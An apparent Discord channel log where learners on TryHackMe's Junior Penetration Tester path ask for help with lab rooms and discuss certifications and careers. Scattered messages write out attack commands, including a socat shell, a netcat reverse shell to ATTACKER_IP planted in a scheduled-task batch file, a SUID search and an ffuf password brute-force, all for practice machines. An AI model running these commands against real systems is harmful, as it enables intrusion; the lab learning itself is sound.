#junior-pentester-path

1 messages ยท Page 11 of 1

undone flint
#

my flag is THM{SQL_INJECTION_3840}

#

for task 6

#

but it is not taking it as correct

undone flint
#

am i doing something wrong? i finished the other tasks in the Blind SQLi room, but not step 6 , so that room is now ma first room that does not complete

#

in the login form, i got "You bypassed the login and can now move to the next level", so that looked good, but the flag presented when entered give me computer says no

glad crypt
#

try to type in the flag I also had an error when i pasted the flag

#

Anyone in Privilege Esccaltion Room?

hollow dirge
#

I also feel the same. Started 20 days ago but i believe consistency is the key!

magic dome
prisma raptor
prisma raptor
glad crypt
modest arch
#

I think i need help with Windows AD. Its not letting me Remote Desktop Connect. Saying that the connection is conflicting with another connection?

#

keep getting this error:
The remote desktop server has closed the connection because it conflicts with another connection. Please try again later.

modest arch
# violet brook Which room ?

I was doing WIndows AD. But i figured it out from the instructions. SInce I ran the machine in my browser and i"m on linux. I didn't nor couldn't run RDP to connect. It was optional

#

Thanks for the assist though

dreamy kernel
#

the what the shell room is NOT 45 mins ๐Ÿ˜ญ

#

reading alone took me an hour to digest

violet brook
dreamy kernel
#

yeah I knew that from a long time ago but setting it up as 45 mins is super funny to me haha

magic dome
#

i am doing the room What the shell? I am experimenting with socat and when i set up the bind shell i have a connection like "0;@ip-10-10-23-94:~7;file://ip-10-10-23-94/root" why could it be? i connect to shell like this: socat TCP:10.10.120.15:4444 EXEC:"bash -li"

fleet latch
#

Hello guys, can anyone here help me with one question or better said help me get "unstuck"?

I am working on the optional challenge in the Upload Vulnerabilities room. (The jewel website)

I remove client-side checks for file upload, I've downloaded nodeJS reverse shell and adjusted its content to my port number 4444 and IP address, I have avoided the server-side check by MIME; uploading reverse shell as .jpg successfully. Enumerating /content directory with gobuster I can see that now there is additional jpg image, which my reverse shell. However, when I try to trigger it from /admin page by doing ../content/<imageName>.jpg it doesn't trigger the listener on 4444 port. I just get an error message "module does not exist". Am I missing something?

hardy sierra
formal river
#

Hey friends,
Iโ€™m stuck on Task 12 of the Burp Suite Intruder room (https://tryhackme.com/room/burpsuiteintruder?taskNo=12).
I understand the steps needed (macro for session + CSRF token, Pitchfork attack, etc.), but I canโ€™t actually complete the brute-force because Burp Suite gets extremely heavy on memory and becomes unresponsive during the attack.
Has anyone found an efficient workaround for running this attack with such a large wordlist without crashing Burp?

keen crow
#

Hi guys, I just completed the Jnr pen tester path. I wanted to know if there's anyone here who has taken the PT1 CERT EXAM?

amber herald
#

hey, i am new here, i just finished the JR pentester path, is there any suggestion of rooms and challenges that i can practise my skills on? i would love to have a list of 20 rooms for exemple that are easy to begin with

violet brook
amber herald
#

thanks!

stoic cedar
#

Hello, I wanted to know if it's normal that I find the lateral movement and pivoting room extremely difficult even though it's supposed to be an easy room.

prisma raptor
violet brook
stoic cedar
#

can someone help me ?

#

sbmclient doenst work

#

for the roo lateral movement and pivoting

prisma raptor
stoic cedar
#

I just followed thm room instructions

silent siren
#

People

#

Does anyone want to play CTF?

prisma raptor
stoic cedar
worthy tide
#

guys can someone help me with task5 Linux Privilege Escalation room

#

?

blissful wave
#

@worthy tide yo

violet brook
quartz temple
#

Hello I was on vulnerability 101 Task 4:
Using NVD, how many CVEs were published in July 2021?
Since i am not able to find full listing page on nvd and also since it is down i used wayback machine were the ans is 1585 but thm shows it as wrong ans can some one help

violet brook
quartz temple
#

on the curr nvd site i could not find the full listing option
So i went to wayback machine and got the old nvd page that had the full listing page and in that i went on 2021 july

quartz temple
violet brook
prisma raptor
#

You may wish to verify your account and post images instead (as folks won't simply click on links from random folks from the internet).

limber gulch
#

Hey I'm looking for a mentor or someone to go through this with as I feel I learnt better with someone than by myself, can send me a message, I'm a noob trying to learn

glacial lotus
#

i cant wrap my head arround linux Privilege Escalation. Im dont know what to do mos times. Task 6 was the only one so far i could understand. But kernel and SUID i dont get it.
How you guys learn this stuff ?

violet brook
glacial lotus
# violet brook What casuses the confusion ๐Ÿ™‚ ?

it was multiple things tbh.
I was executing the GTFObins wrong. I didnt understood was bitsets means in the right context and how its connected with
"find / -type f -perm -04000 -ls 2>/dev/null" command.
But yesterday at work i watched 2 youtube videos that where explainign thses thing at a very core level. And it made click finally.
Know i understand what the command does and shows me and how to proper uses gtfobins and finished the labs

brisk gate
#

Just getting started, does the training path prep you enough to pass the cert or is additional training recommended ?

prisma raptor
brisk gate
molten plank
#

Room called: What the shell, task 13 Q6/7
Hey guys is there a way to do this task, i cant get the powershell, i mean i can connect but when i type commands i dont get any answer

prisma raptor
molten plank
#

Php Reverse shell modified, I changed de uname to make a power shell

#

And I can connect, but after I use a command I don't get any response ๐Ÿ™

prisma raptor
modest arch
#

Hey

#

Anybody hopin' into Windows privilege Escalation >>

#

Lets do togethor

modest arch
gaunt fractal
#

does anyone know a good youtube channel walking through this path? not the ones that just show the solutions, i mean the ones that actually explain the stuff?

fair dew
#

"The $ in SMB/CIFS URIs means that the share is hidden, and won't be displayed when browsing shared folders"

#

so why can I view the share names when running
smbclient -N -L //10.129.34.168

violet brook
violet brook
clever flare
#

Hello, in the file inclusion room, challenge 3, we are to change the http request from get to post in order to bypass the string filtering. I see on online writeups that people use curl. I do the exact same using burp but it never works. The include function shows: include(.php).
Anyone has any idea why burp doesn't work?

violet brook
clever flare
#

Repeater > Inspector > Request Attribute > Method

hoary pasture
#

Hello, can you suggest any additional "beginner friendly" labs where I can practice what I learned on the jpt path? I'm trying to combine THM and portswigger, do you have other suggestions? Thank you in advance

violet brook
violet brook
ashen mossBOT
fair dew
violet brook
ashen ocean
#

Hi I hope that youโ€™re fine
Please gys is the jpt free ?

violet brook
cyan torrent
#

Does the jrpt cert include more training or just being a exam ?

violet brook
cyan torrent
#

has anyone solved Vuln Capstone room?
I have downloaded the script but cannot execute RCE
Pls help meee, thanksss

violet brook
cyan torrent
#

ahh, i got it, tks

wicked gyro
#

Is this path enough to try PT1 ?

glacial lotus
violet brook
next lanceBOT
#

Gave +1 Rep to @violet brook (current: #1 - 5922)

glacial lotus
modest arch
modest arch
glacial lotus
#

yeah same after 2 days in this module i watched a video of someone explaining piv escelation for dummies and then i clicked for me coolguy

weary galleon
#

Hello everybody

#

Any mercifull soul that could help me in a osint situation please? Still learning a bunch of stuff but I could really use some help

weary galleon
#

@soft yew mind if i send you a dm mate?

#

dont want to polute the chat with a bunch of questions

soft yew
weary galleon
#

Ok ill explain

#

Im finishing my course on cybersecurity and the final project consists in finding public information about the school

#

The teacher told us to use a bunch of websites and whatever tools we want to use

#

The problem is that I cant find some stuff that he is asking in the project like public emails or documents like pdfs or .doc .xls

#

I already found ip adresses domains subdomains server software etc etc

#

I already use a couple of transforms from maltego

#

And other Kali Linux tools

#

Sorry can you explain better please?

#

Is that like Google dorks?

wicked gyro
#

Yes

weary galleon
#

Yes I already use it

#

And the only thing I can find is a simple pdf file

#

My question is like: is there any other tool that could be more accurate? I dont know likeโ€ฆ a specific tool?

wicked gyro
#

You can find some on github

violet brook
latent badger
#

@hollow marsh we're you able to complete it? It keeps DOSing on me as well.

weary galleon
next lanceBOT
#

Gave +1 Rep to @violet brook (current: #1 - 5928)

glacial lotus
#

Yeeeeah coolguy
2 Month of daily grind

modest arch
glacial lotus
#

Thanks โค๏ธ
The grind never stops

quick abyss
#

How was the exam? Like what style was it?

violet brook
violet brook
quick abyss
#

the PT1 exam?

cursive wasp
#

hi im doing jr pentesting path and my attack box server is very far so ping is very bad i want to setup that lab in my pc as vm i have a fine spec pc 32 gig ram r5 5500 and gtx 1060 good enough for labs so i want someone to help me with it please cuz im really new to all this
i am in india fyi so .... yea i would love to have a meet or a call to help with setup
i already have kali , ubuntu and a wazuh vm ready

soft yew
violet brook
hexed creek
#

hi can i know how to change this region to something else cause my attack box very laggy, i already try to changed in my "access" with EU-VIP but it doesnt effect anything

weary mesa
hexed creek
#

I see ๐Ÿ‘

weary mesa
next lanceBOT
#

Gave +1 Rep to @hexed creek (current: #3157 - 1)

hexed creek
next lanceBOT
#

Gave +1 Rep to @weary mesa (current: #13 - 798)

weary mesa
hexed creek
#

yup

#

eventho actually im in asian

#

but still acceptable

#

thanks budd

quartz temple
#

hello i am doing the linux priviledge escalation room in that the Task 11 I am getting this error when i am trying to run the compiled c code
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)

#

@violet brook

next lanceBOT
#

Gave +1 Rep to @weary mesa (current: #13 - 824)

simple zodiac
#

I am new using tryhackme how to step step with deep knowledge of everything how to get how to study how to get this

robust prairie
violet brook
hexed creek
#

hey guys, i wanna ask if i connect to my openvpn for exp EU-vip than my attackbox region is EU server does it have an impact on it such as no laggy ?

weary mesa
ashen bloom
#

When should I start this path?

I just started TryHackMe about two days ago and have gone through almost the whole pre-security pathway. (With free version)

I have no to little experience with cyber security/hacking.

violet brook
ashen bloom
next lanceBOT
#

Gave +1 Rep to @violet brook (current: #1 - 5947)

heavy drum
#

Is Cisco Ethical hacking course worth it?

violet brook
ornate pike
heavy drum
ornate pike
#

its doesnt teach ethical hacking at all

#

and its too specific

crimson cape
#

.

heavy drum
next lanceBOT
#

Gave +1 Rep to @ornate pike (current: #3172 - 1)

soft yew
sharp geode
#

Hey guys I am newbie in this field (have zero knowledge in IT)and I want to change career in ethical hacking how should I began.

weary mesa
quiet mesa
#

its all in there

lilac vale
#

Linux and Windows Privilege Escalation has been the worst experience I have dealt with EVER

quick abyss
#

tbqh I have restarted the windows one having felt like i missed the point

prisma raptor
tender patrol
#

Task 6 virtual hosts of subdomain Enumeration is giving me problems. I'm having no luck and been stuck on this lab for a while. I followed the instructions but still don't get the subdomain names. Any step by step? I'm not sure what I'm doing wrong

azure steeple
#

My attack box does but the wprivesc2_v1.1 doesn't appear at all. I tried two browsers, cleared cache, relogged..nothing helps.

#

It's like my last one for this path too so quite annoying. Had to go through the whole part 3-5 with a weird bug where it was constantly right clicking on its own and I had to alt tab constantly to fix it..

weary mesa
weary mesa
rugged inlet
azure steeple
#

Maybe Iโ€™m doing it incorrectly

next lanceBOT
#

Gave +1 Rep to @weary mesa (current: #9 - 973)

weary mesa
azure steeple
next lanceBOT
#

Gave +1 Rep to @weary mesa (current: #9 - 974)

modest arch
#

Hi all. I've come across a really annoying bug in the "Walking an application" room. When I try to enter the flag for the fifth and final task, it keeps automatically inserting an underscore in the wrong place so I can't successfully submit. Doesn't matter if I manually type the flag or try to copy/paste. Anyone come across this before? I've tried switching browsers and logging out/logging back in to no avail.

prisma raptor
modest arch
trail maple
#

hello. in the https://tryhackme.com/room/passiverecon room at task no 6 this question : Based on Shodan.io, what is the 3rd most common port used for nginx? requires the answer 5001. but the current 3rd most common port, that if my way of telling that is not wrong, is 888.

weary mesa
#

@modest arch @winged lotus it may be the wrong flag also
you are welcome to share it here, but avoid spoiling by inserting it inside double pipes like this || secret flag ||

weary mesa
nimble nacelle
#

try googling the room name but at the top select "videos" or just go to youtube & search for your room name & look for one of the longer videos (use right click so you can check out several) & find one that sections the work by Task #1 - some explain really well, but some just zip through, so find one that explains & follow along & likely see where you stepped off the beaten path.

nimble nacelle
nimble nacelle
modest arch
modest arch
weary mesa
grave olive
#

Wassup

quartz cipher
#

What's up everybody! Totally new here and posting because I'm getting pretty frustrated. I'm on Local File Inclusion, Task 4, and I'm really confused as to how I'm supposed to get to the answer. I've got the Attackbox on, I've entered in the filename that I'm looking for in their search bar, but the output is nothing like what the answer is looking for. What exactly am I supposed to do?

low tapir
#

Ask echo

timid shale
#

Well after almost what felt like an eternity I have just managed to successfully complete the Junior Pen-tester Path. It was soooo difficult but very informative and well worth the hard work. I have enjoyed every minute. It must have taken me closer to 60 hours to complete rather than the stated average of 30 hours, but the time just flew by really quickly. ๐Ÿ˜ƒ

unique junco
#

What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task. - I don't seem to understand this question. Is there a user called 'penny'?

lunar steppe
#

Hi people

#

In the vulnerability 101 room task 4 they are asking for number of cves published in july 2021 on nvd plat but even if i put the right number thats 1585 its nit working i finished the room but this task is blocking me

snow blade
lunar steppe
#

I put the range from 1 to 31 july if 2021

#

What more filter should i add

snow blade
lunar steppe
#

I got it

#

Ty

stuck topazBOT
#

Done!

#

Done!

waxen wagon
#

In Authentication bypass room, i am getting all error while brute forcing. did this happened to anyone else or I am doing any mistake?

snow blade
waxen wagon
#

I made it manually in the directory and also again from the terminal yet its giving all error. i have tried almost 3/4 times

snow blade
#

can you copy paste your command here?

waxen wagon
#

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200 copied this command and paste exactly, i think its having problem in the username file but i checked that yet its all giving error.

snow blade
waxen wagon
#

yeah while doing the room machine was running. i checked the url, can't understand where's the problem

snow blade
#

Change machine_IP with the IP of the room:
http://machine_ip/customers/login

waxen wagon
#

well i did this, machine is not running rn thats why its showing machine ip but when i did then there was ip. its not the issue.

snow blade
waxen wagon
#

the password file was in the root directory and so the username file. i have watched some videos also but even doing exact same mine is not working, it's testing but showing all error

snow blade
#

try with this(but check if file path is the same on your machine): /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt

waxen wagon
#

okay. Thanks btw

snow blade
trail maple
#

hello, i am doing the Windows Privilege Escalation - junior. and on task 4 i need to use this command in powershell. C:> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat i get an error. i watched a walkthrough video on youtube, i can't see any mistakes on my part. where can i get help?

#

i tried putting this "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444" between comma as perplexity and chatgpt said, but while the command works, i get nothing on the listener

prisma raptor
trail maple
trail maple
#

i found out my mistake.... the command should have been run in cmd not powershell

trail maple
#

Didn't find an instance where it said this, but only there works

eager sand
latent stirrup
#

Hi guys. Please help me i'm stuck on this task since 1 week

#

The two last flags

#

Idk how to find the flag

#

I've viewed the page source codes but i don't still found the flags

latent stirrup
#

No body wants to help me?

modest arch
#

Or describe completely

lunar steppe
#

the privileges escalations is rough

prisma raptor
latent stirrup
next lanceBOT
#

Gave +1 Rep to @hollow venture (current: #3244 - 1)

lunar steppe
#

guys in the privileges escalation room task 7 we have to look for a way to read /etc/shadow and /etc/passwd in the thm example they used nano but we cant do same because there is no nano file when we look for it by doing find / -type f -perm -04000 -ls 2>/dev/null but i searched for the solution and ive found that they used base64 that have a s bit set and we can exploit that by using gtfobins ok butt i cant i dont understand how to do it i cant use sudo the user isnt a sudoer so i cant use nano too i dont know how to do that furthermore the example they give us on thm was not that accurate let me know if i missed somehting

weary mesa
lunar steppe
#

ok ive found the hashes

#

but now i cannot do any with thses hashes

weary mesa
lunar steppe
#

bcs i dont ahve any permission

#

ive seen that someone in the walktrought that put the hash in a file called literraly hash and then used it to crack it with john the ripper

#

id even know if i can use john

#

i missed somethi9ng meybe but i dont think

#

@weary mesathats why

weary mesa
lunar steppe
#

@weary mesa i just dont know how to do it if i cant use any tool

weary mesa
vernal rampart
#

Can anyone help me, I have completed the authentication bypass (Jr. Pentester) room in try hack but I completed that in the lab but how to test it in the real website using fuff tool, please anyone help me

lunar steppe
#

@weary mesa i have the hashes but i cant put them in any files to use john how am supposed to crack it lol

weary mesa
lunar steppe
#

Ure right ty

inland mirage
#

Hey I have some questions about atopic I didnโ€™t fully understand in the
authentication bypass
Task 4 - logic flow
If anyone can help me understand

inland mirage
#

Iโ€™ll try to elaborate maybe it will help with the answers
In the task 4 it says the author understands he need to sent curl with the right string to somewhat inject to the php?
So Iโ€™m not familiar with php or with how did he got to that
Itโ€™s pretty simple watching what he did as an answer but I want to understand the path he took to know what to do there

lunar steppe
#

hello guys i wonder if the jr pen tester certificate has an expiration date

prisma raptor
lunar steppe
#

alr ty

stuck topazBOT
#

Done!

#

Done!

tranquil compass
#

Learning a lot with THM, probs will do this path next.. my question is โ€œis this cert actually good for anything?โ€.. I wasnโ€™t expecting it to be and am doing it out of personal interest, but I figured at most Iโ€™d put it as a post on LinkedIn..

#

Like I said at most, but curious other peopleโ€™s exp

soft yew
tranquil compass
gaunt flower
#

i am just 3 rooms from completing this room

dreamy remnant
#

Hi I am Naruto Uzumaki ... I would like to ask something... Is this junior-pentester path even worth it.....

#

What are ur personal experiences

tranquil compass
dreamy remnant
#

ohh

stuck dagger
#

I'm on a 26 day streak and just started the JPT path. I'm also studying the network and security+ simultaneously. I like the training platform but I get it doesn't mean much to employers.

tranquil compass
#

Every path has its struggle, pick yours. You could be the kid who scratches and claws for his degree to mean something and scathed his way through a 4yrs bachelors (more common than you know)โ€ฆ then fails the skills portion and finds getting employed hard because of it.

#

Then he finds himself needing to circle back and get certified because of it, in spite of having a degree.

#

If no degree, networking means something way more, and that doesnโ€™t mean โ€œplaying fakeโ€ and shaking hands at coffee hours, you should be attending clubs, hackathons, open source projects and conferences like your life depends on it.. donโ€™t be pushy, but these are open to the public spaces where you have a chance to โ€œshow what you knowโ€

#

Some of the people you meet there will be in a position to extend offers or communicate with people who can.. if you are who you need to be at that time. If you keep building your skills youโ€™ll reach point where people are surprised youโ€™re not employed in the field, or not in this position.. then when opportunities arise your name will be one of the first to come up.

#

Most of all donโ€™t become jaded because what you think you โ€œdeserveโ€ doesnโ€™t fall in your lap (not saying you are but itโ€™s common).. people with zero experience join this field because they think itโ€™s an easy six figures, if your truely passionate about the subject the first few years of leg work shouldnt mean much (of course it sucks)โ€ฆ but your interest should get you through that portionโ€ฆ

I honestly think the field becoming oversaturated is a good thing in a round about way, it will drive out the people looking for easy paychecks with a paid yoga hour. And good because those are the people who skate the second they find a place to do so.

#

Itโ€™s not what you can do in 3 months that counts, itโ€™s what you can sustain for years on end and still be enthusiastic about.

tranquil compass
stuck dagger
#

Thank you, thats very insightful. Im actually working on network, security, and then pen test+ and using THM as a practice/learning room.

#

Also in the process of setting up VMs to practice on when im ready.

eager sand
#

how can i enable copy/paste from my host machine to tryhack me machine

sudden wren
#

The directions of burpsuite intruder on last task is a puzzle to me luckily there is AI but it could be easier to understand.

vernal rampart
#

Anyone suggest what I do for pentester intership

sudden wren
#

And here I thought all jobs for pentesting is at least 2+ years experience,

prisma raptor
prisma raptor
spare talon
#

Hello friends, Iยดm wondering how hard can PT1 cert be if attempted right after finishing Jr Penetration Tester path. Is it doable, or it escalates too much in difficulty?

regal ice
#

Hello Guys,

Under the jr pentester path I'm currently doing the File inclusion module (Jr Penetration Tester -> Introduction to Web Hacking -> File Inclusion)

The last section of this module is challenges, which I'm unable to figure out without referring to walkthroughs on medium. What is that I could be doing wrong and how can i bridge this skill gap?

tranquil compass
#

More than likely just exposure and repetition, unless you did the โ€œintro to cyberโ€ path, a lot of these concepts are going to be your first introduction to them.. expecting one or yourself to be able to accomplish each task flawlessly after a simple read through is not necessarily realistic

#

Can download you own VMs set up and attacker and target and attacker box and run reps

#

Just see everything as exposure to the material until you finish JR then go back and rep what you didnโ€™t retain.. nothing wrong with walkthroughs as long as you use it to identify what you donโ€™t know and go practice it until you know it

#

In the grand scheme of things even if/when you pass PT1 if you decide to go that route, youโ€™ll still be at a โ€œhave been exposed to the materialโ€ level and not much more.. unless you decide to do more practice in your own time.. Iโ€™m basing that off of the pathway THM provides alone.

#

I had to consult a walkthrough for Linux Priv Escal and the dude who makes the walkthrough is a professional in the field, and he was getting frustrated.. albeit he doesnโ€™t edit out his mistakes and solves them in real-time which most walkthroughs donโ€™t provide..

regal ice
#

Thank You @tranquil compass - Appreciate your feedback... it makes sense... Yes I'll be aiming for the PT1 in the coming year....i plan to do the all the recommended materials that was highlighted in PT1 learning resources in addition to the Jr Pen tester path. Thank you once again.

next lanceBOT
#

Gave +1 Rep to @tranquil compass (current: #3307 - 1)

frail sandal
#

Hey! I am facing some issue with Bypassing UAC room so when i starts the machine its constantly "reconnecting with remote machine" its says, so i terminate it and starts again and again 3 to 5 times but same issue and I'm unable to rdp it through my vm and also with attackbox and in the end i got this...
Please help me what's going on is it my mess or something else.
Thanks

simple pawn
graceful lark
#

hey guys i have a question. I'm doing the linux privilege escalation room and for some reason on Task 5 whenever i try to use wget to grab the exploit file from my python http-server it tells me that write permission is denied

#

wondering if anyone would be willing to help me

radiant gale
graceful lark
#

yeah I figured it out thank you! @radiant gale

radiant gale
#

nice

dusty reef
#

wowowowow..

leaden bane
#

How was this solved, guys?

ornate flame
leaden bane
#

I am experiencing the exact same problem as this one @ornate flame but I think it's my own cookie my net cat listener grabs...

leaden bane
ornate flame
ornate flame
leaden bane
ornate flame
#

Don't include the staff session bit

leaden bane
#

The exact error is:
``Uh-oh! The answer you provided may not be in English. Please review it and try again..```

On other instances, I just get incorrect answer as the error message.
@ornate flame

ornate flame
ornate flame
leaden bane
#

The moment I submit the payload into the field for the ticket creation, I get a response on the netcat listener... I don't think that should be the case. I should get a listener connection when an admin views the created ticket instead, right??? @ornate flame

leaden bane
ornate flame
#

You need to put the xss line into the field when you create the ticket

#

once thats done

#

click on the ticket ID

#

and you should get the results in the terminal were you ran the nc command

low swift
noble lintel
#

Please does anyone know how I can fix this

#

Premium but not working

modest arch
#

Anyone solved challenge 3 in file inclusion room? I got stuck

modern monolith
#

Hello guys, I am new to TryHackMe. I started my journey in nov. And i am super excited to become a pentester. I know it's gonna be hard and it will take time, and I am ready. Right now, I know Linux (basic, ofc), and some basic things here and other. NGL when I used Wireshark and Metasploit, i was sooooo happy, and when i solved some questions all alone, that feeling dayum better than playing Valorant. I hope all newcomers like me enjoy, and I request my seniors to help us noobies.

spice parrot
#

@modern monolith im doing the same but I'm on network on the 101 path

#

looking forward..........

modern monolith
ashen oxide
#

I want to retake my finished junior path again. How can I do it?

remote iris
proud crystal
#

i been thinking bout doing this also. my memory sometimes is like a gold fish haha

warped crypt
#

#Script kiddie

prisma raptor
spark path
#

Almost 90% through this path and I plan to complete it within the next few days. Also, Burp Suite is very ๐Ÿ†’ .

prisma raptor
cold seal
#

I am now officially on this path and i figure it will take me at least 5 to 6 months to complete considering the recent cybersecurity 101 took me 4 months to complete. I take my time i am in a hurry but i also for the sake of my mental health dont want to burn myself out. Cramming everything in a matter of days and endless hours to me is very unproductive these days its more focus and discipline and focus on completing one module at a time rather than speed running through all of it. But that is just me.

spark path
unreal forge
austere root
#

I am doing task 3 in the Nmap Live Host Discovery Room. I cannot find the Start Machine button for some strange reason. There is only one button for the static site in Task 2

daring cradle
austere root
#

I am looking for the button to start the Start Machine button to start my target ip.

daring cradle
#

You dont really need a target machine to answer these questions

austere root
#

Thanks. I just checked again.

austere root
#

Doing the nmap advanced scanning room. I am trying to do an Ack scan but the results arent showing anything.

I have tried using sudo nmap -sA <Target IP>
I also tried sudo nmap --scanflags ACK <Target IP> but no ports are showing up. I have also reset the machine multiple times to no avail

craggy pilot
#

have you tried with -p- to scan for all ports maybe its not within the default ports that nmap scans for

austere root
next lanceBOT
#

Gave +1 Rep to @craggy pilot (current: #3476 - 1)

austere root
#

It says all ports are unfiltered which is not right

craggy pilot
#

it was a guess from my part what you could try.

austere root
#

its okay let me take a break and try again later. Could be a connection problem

daring cradle
# austere root It says all ports are unfiltered which is not right

Why do you think it's not right?
TCP ACK scan is only useful for finding out whether a firewall is blocking certain ports or not. So, ports are going to show as filtered or unfiltered. Filtered means the ACK didn't receive a response as it was blocked by a firewall. Unfiltered means the ACK reached the target port and a RST was received. So, it wasn't filtered by a f/w. An usollicited ACK always results in a RST (reset) regardless whether or not a service is actually running on that port. This is why a TCP ACK scan is only useful for figuring out firewall rules and not for finding out actual target port or service state.

austere root
glad zenith
#

Why do I not see the flag here:

midnight fox
#

Cause I am also stuck there i don't seem to find the flag

glad zenith
#

nope

#

Still waiting on someone who can help me out

midnight fox
#

Keep going mate you are gonna figure it out, I already did

glad zenith
#

Can I then have a hint ???

daring cradle
glad zenith
#

hmm, I only changed the get to POST
And added the content-type one

#

So one of those two must be it

#

now experimenting which one because right now I do not have a idea

#

@daring cradle

#

and added the file line

daring cradle
# glad zenith and added the file line

You know that if you right-click on the request packet in repeater you can choose "change request method" and it will change it to POST for you. So, there's really not much manual editing necessary here.

glad zenith
#

oke

#

but the repeater is a good choice ?

daring cradle
glad zenith
#

oke

#

will try that way

#

right now I changed the method in the proxy

#

Are you South Afrikan or Dutch.
Your name almost looked like Dutch words
@daring cradle

daring cradle
glad zenith
#

aha, im from East Netherlands

#

will try it after the sqlmap is ready
is very very slow in attackbox

#

๐Ÿ™

daring cradle
glad zenith
#

gtg ??

daring cradle
#

got to go

#

sry

glad zenith
#

enjoy the meal

glad zenith
#

@daring cradle still no flag

daring cradle
glad zenith
#

I tried that one too but then got a 404
Will try tommorrow again. It is now time to sleep

teal zenith
#

just finished this whole path

glad zenith
#

@daring cradle still no luck

#

oke

#

A error:

<br />
<b>Warning</b>:  include() [<a href='function.include'>function.include</a>]: Failed opening '/etc/flag1' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in <b>/var/www/html/lab1.php</b> on line <b>26</b><br />
daring cradle
glad zenith
#

๐Ÿ˜ข

#

no ideas what to change

daring cradle
# glad zenith ๐Ÿ˜ข

If you want I can tell you how to do it in Burp, because I think you are editing more than should be necessary

glad zenith
#

is one of the problems that before the challenges part must be a / ?

daring cradle
glad zenith
#

I try it the whole time in Burp

#

oke, I started up attackbox to try

#

but the /etc/flag1 must that now be in the URL
or as last in the request

#

and I do not change it
If burp changes the method the challenges part disappear

daring cradle
#

Just browse to the page and enter "/etc/flag1" and click include. Then find the request in Burp and send it to repeater, then in repeater right click in the request and select "change request method", then send it

glad zenith
#

oke

daring cradle
#

like this you dont need to do any editing

glad zenith
#

oke

#

burp is now starting on the attackbox

#

oke, now chancing the method

#

and the first flag
Finnaly

#

now thinking how and where I can change cookies

#

for flag2

#

some thinking to do
Change the cookie to administrator but then I see a message "welcome administrator" but also a warning

#

time for a break

misty spoke
#

I'm stuck on the final challenge (RFI/RCE) for File Inclusion: https://tryhackme.com/room/fileinc
I think I understand generally what I could do - host a malicious file with ngrok and coerce the app to include it - but as far as I can tell, the target VM has no connectivity to any other hosts, so I can't get it to include anything even with HTTP. Am I missing something? This seems like a huge leap from anything I've been asked to do on this path so far

TryHackMe

This room introduces file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal.

cold seal
#

I am finally on this this pathway i hope to complete this by the summer and take the PT1 since the cybersecurity 101 path took me 4 months to complete, unlike most i dont rush i take my time and beside cramming everything as fast as possible doesnt help.

prisma raptor
cold seal
sharp condor
sharp basalt
#

Currently Studying the Advanced SQLi Room but I canโ€™t access the website MACHINE_IP/second/add.php (and yes i started the machine snd used the ip address for the target provided) did it twice on the AttackBox same issue.
Am i doing something wrong? Or is it a THM issue

misty spoke
#

got a little nerd-sniped and tried a couple more things this morning, like using my VPN IP (10.x.x.x) directly as the hostname. But no matter what, the playground times out trying to include it and show an empty file preview, even if I can access the exact same URL through my browser.
With one exception: if I put a URL for the target machine itself, it can access that. It just really seems like it's locked down to be unable to access any remote hosts, which completely defeats the purpose of demonstrating RFI

sharp condor
glad zenith
#

May I have a hint on File Inclusion Task 8 question 2
Where i have to find flag2
I have changed the cookie to admin
But where do I put the request for the file ?

iron jetty
#

Hi,
I can't use burp's browser or the foxyproxy burp, i only have the GET request and the site never loads. The machine IP is working fine on firefox (i'm on the race condition room, i can connect with the 2 users on the website), but everytime i try to connect with burp, i can't. I'm on the THM virtual machine, the certificate is installed, and the proxy parameters are okay. What can i do ?
Thanks
I've already restarted burp, the attack box, the attack IP, firefox, etc

misty spoke
daring cradle
glad zenith
#

oke

#

Is your country also so white ??

daring cradle
glad zenith
#

here also

#

some 1 - 2 cm

gilded pewter
#

Mock site for SSRF room no longer has the Avatars for the final ssrf directory traversal

round grail
#

what is the ip for the acme site

#

nevermind

#

im trying to take a screenshot but it wont work

#

im on subdomain enumeration, task 6 virtual hosts

#

the command is
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP

#

the thing is, what is the machine ip

#

because this room doesnt have any machine i can start

#

is it the attackbox ip or is the ip of the site

#

but wait -u is for the host

#

i just remembered i forgot to turn on the vm at the start

gentle wharf
#

Anyone else having issues with Windows Privilege Escalation > Task 6? The walkthrough states that the provided login should have SeBackupPrivilege but it does not.

C:\Users\THMBackup>whoami
wprivesc2\thmbackup

C:\Users\THMBackup>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
gentle wharf
frigid sorrel
#

Hi, Im in the file inclusion module task 8 question 3, how does the hint know this uses the $_REQUEST method how did it get that information?

#

also thanks in advance

jagged river
# frigid sorrel also thanks in advance

As an attacker doing a black box test, you would not know this. You'd just have to guess, based on responses you are getting from the web app. The hint knows because the room creators know the source code of the PHP web app that they are using.

versed snow
frigid sorrel
jagged river
#

It is probably down to: understanding a bit of PHP, common ways that (old) web apps were (are) coded and common mistakes that developers make which lead to security holes.

#

Not sanitizing $_GET is one and I think $_REQUEST is less common but looks like it gets mentioned in some places. There are also automated tools that will try many of the common "tricks". Finding a parameter like ?file=something is a good indicator to look more closely.

gilded pewter
frigid sorrel
gentle ibex
#

can anyone help me with attack box

white gorge
#

Hey peepz, need help
Stuck on Intro to Cross-Site Scripting
Every task was great until last one, netcat is listening but no matter how long i wait i get no incoming requests. Yes, im using attack box, yes payload has correct ip and port as well as nc does

๐Ÿ˜•

midnight fox
#

The cheat sheet link in command injection room doesn't work anymore

versed snow
# midnight fox The cheat sheet link in command injection room doesn't work anymore

